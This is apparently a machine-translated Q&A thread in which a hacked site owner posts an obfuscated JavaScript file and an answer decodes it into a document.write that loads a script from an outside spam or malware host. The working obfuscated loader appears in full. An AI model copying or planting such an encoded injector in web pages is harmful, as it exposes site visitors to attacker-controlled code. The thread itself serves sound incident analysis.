use*_*191 2 javascript security obfuscation deobfuscation
我发现我的一个网站被黑了,经过调查,我查看了一个上传的javasript文件,由于疯狂的混淆,我无法相信它实际上有用.
我对它如此感兴趣,我需要知道它到底是怎么回事.如果有人能提供任何非常感谢的信息!另外,这将帮助我找到我服务器上其他隐藏的黑客文件!
以下是内容:
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"=\\\\\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"://"+$.$$_$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.$$_+$._$$+"-\\"+$.__$+$.$$_+$._$$+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$$_+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.___+$._$+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"."+$.$$__+$._$+"\\"+$.__$+$.$_$+$.$_$+"/\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.__$+$.$$_+$._$$+"/"+$.__+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+$.$$_$+$._$+(![]+"")[$._$_]+"/\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$_$+$.__$+$.$$_$+$.$$$_+$.$_$$+$.$_$_+"\\"+$.__$+$.$$_+$._$_+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\\\\\"></\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+">\\\");"+"\"")())();
首先,添加一些空格:
$ = ~ [];
$ = {
___: ++$,
$$$$: (![] + "")[$],
__$: ++$,
$_$_: (![] + "")[$],
_$_: ++$,
$_$$: ({} + "")[$],
$$_$: ($[$] + "")[$],
_$$: ++$,
$$$_: (!"" + "")[$],
$__: ++$,
$_$: ++$,
$$__: ({} + "")[$],
$$_: ++$,
$$$: ++$,
$___: ++$,
$__$: ++$
};
$.$_ = ($.$_ = $ + "")[$.$_$]
+ ($._$ = $.$_[$.__$])
+ ($.$$ = ($.$ + "")[$.__$])
+ ((!$) + "")[$._$$]
+ ($.__ = $.$_[$.$$_])
+ ($.$ = (!"" + "")[$.__$])
+ ($._ = (!"" + "")[$._$_])
+ $.$_[$.$_$]
+ $.__
+ $._$
+ $.$;
$.$$ = $.$
+ (!"" + "")[$._$$]
+ $.__
+ $._
+ $.$
+ $.$$;
$.$ = ($.___)[$.$_][$.$_];
$.$($.$(
$.$$
+ "\"" + $.$$_$ + $._$ + $.$$__ + $._
+ "\\" + $.__$ + $.$_$ + $.$_$ + $.$$$_
+ "\\" + $.__$ + $.$_$ + $.$$_ + $.__
+ ".\\" + $.__$ + $.$$_ + $.$$$
+ "\\" + $.__$ + $.$$_ + $._$_
+ "\\" + $.__$ + $.$_$ + $.__$ + $.__ + $.$$$_
+ "(\\\"<\\" + $.__$ + $.$$_ + $._$$ + $.$$__
+ "\\" + $.__$ + $.$$_ + $._$_
+ "\\" + $.__$ + $.$_$ + $.__$
+ "\\" + $.__$ + $.$$_ + $.___ + $.__
+ "\\" + $.$__ + $.___
+ "\\" + $.__$ + $.$$_ + $._$$
+ "\\" + $.__$ + $.$$_ + $._$_ + $.$$__
+ "=\\\\\\\"\\" + $.__$ + $.$_$ + $.___ + $.__ + $.__
+ "\\" + $.__$ + $.$$_ + $.___ + "://" + $.$$_$
+ "\\" + $.__$ + $.$_$ + $.$$_
+ "\\" + $.__$ + $.$$_ + $._$$
+ "-\\" + $.__$ + $.$$_ + $._$$ + $.$$$_
+ "\\" + $.__$ + $.$$_ + $._$_
+ "\\" + $.__$ + $.$$_ + $.$$_ + $.$$$_
+ "\\" + $.__$ + $.$$_ + $._$_
+ "\\" + $.__$ + $.$_$ + $.___ + $._$
+ "\\" + $.__$ + $.$_$ + $.$_$ + $.$$$_ + "." + $.$$__ + $._$
+ "\\" + $.__$ + $.$_$ + $.$_$
+ "/\\" + $.__$ + $.$$_ + $._$$ + $.$$__
+ "\\" + $.__$ + $.$$_ + $._$_
+ "\\" + $.__$ + $.$_$ + $.__$
+ "\\" + $.__$ + $.$$_ + $.___ + $.__
+ "\\" + $.__$ + $.$$_ + $._$$
+ "/" + $.__
+ "\\" + $.__$ + $.$$_ + $._$_ + $.$_$_
+ "\\" + $.__$ + $.$_$ + $.$_$ + $.$_$_ + $.$$_$ + $._$ + (![] + "")[$._$_]
+ "/\\" + $.__$ + $.$$_ + $._$$ + "\\" + $.__$ + $.$_$ + $.__$ + $.$$_$ + $.$$$_ + $.$_$$ + $.$_$_
+ "\\" + $.__$ + $.$$_ + $._$_ + ".\\" + $.__$ + $.$_$ + $._$_
+ "\\" + $.__$ + $.$$_ + $._$$
+ "\\\\\\\"></\\"
+ $.__$ + $.$$_ + $._$$ + $.$$__
+ "\\" + $.__$ + $.$$_ + $._$_
+ "\\" + $.__$ + $.$_$ + $.__$
+ "\\" + $.__$ + $.$$_ + $.___ + $.__
+ ">\\\");"
+ "\""
)())();
1.
一切,但最后的语句创建对象$,其值多为数字和字符串,如"f",8和"return".
然而,特别重要的$.$是Function.调用Function(s)创建一个正文的函数s.
例如,Function('return 1;')退货function() { return 1; }.
基本上,Function(s)()(或在这种情况下,$.$(s)())相当于eval(s).
2. 最后一个语句中的所有字符串连接都创建一个字符串.
return"docu\155e\156t.\167\162\151te(\"<\163c\162\151\160t\40\163\162c=\\\"\150tt\160://d\156\163-\163e\162\166e\162\150o\155e.co\155/\163c\162\151\160t\163/t\162a\155adol/\163\151deba\162.\152\163\\\"></\163c\162\151\160t>\");\"
3.
当使用$.$return作为字符串进行评估时
document.write("<script src=\"http://dns-serverhome.com/scripts/tramadol/sidebar.js\"></script>");
4.$.$在此结果上再次
呼叫完成攻击.
此代码,显然是打算以显示为无害的可能,不使用eval,Function,function,或任何HTML实体喜欢<.
对FunctionIMO 的双重调用不是必需的,但我认为它进一步混淆了代码.
现在,关于你的最后一个问题,你打算运行第三方Javascript吗?如果是这样,我所知道的唯一强大的框架是Google Caja.
编辑:这似乎是结果jjencode为
document.write("<script src=\"http://dns-serverhome.com/scripts/tramadol/sidebar.js\"></script>");
jjencode甚至可以选择返回回文混淆.
| 归档时间: |
|
| 查看次数: |
513 次 |
| 最近记录: |